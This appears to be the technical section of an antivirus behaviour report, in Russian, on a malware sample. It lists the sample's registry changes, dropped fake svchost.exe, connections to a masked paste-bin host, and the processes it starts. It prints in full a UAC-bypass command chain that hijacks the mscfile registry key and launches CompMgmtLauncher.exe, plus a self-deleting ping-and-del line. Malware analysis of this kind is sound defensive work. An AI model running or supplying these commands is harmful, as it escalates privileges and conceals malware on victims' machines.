Техническая информация
- [<HKCU>\Software\Classes\mscfile\shell\open\command] '' = '%APPDATA%\Microsoft\Windows\svchost.exe'
- %APPDATA%\microsoft\windows\svchost.exe
- %APPDATA%\microsoft\windows\svchost.exe
- 'pa###bin.com':443
- DNS ASK google.com
- DNS ASK pa###bin.com
- '%APPDATA%\microsoft\windows\svchost.exe'
- '<SYSTEM32>\cmd.exe' /kreg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "%appdata%\Microsoft\Windows\svchost.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /kreg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "%appdata%\Microsoft\Windows\svchost.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software...
- '<SYSTEM32>\cmd.exe' /c ping google.com & del "<Полный путь к файлу>"
- '<SYSTEM32>\ping.exe' google.com
- '<SYSTEM32>\reg.exe' add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "%APPDATA%\Microsoft\Windows\svchost.exe" /f
- '<SYSTEM32>\compmgmtlauncher.exe'
- '<SYSTEM32>\reg.exe' delete HKEY_CURRENT_USER\Software\Classes\mscfile /f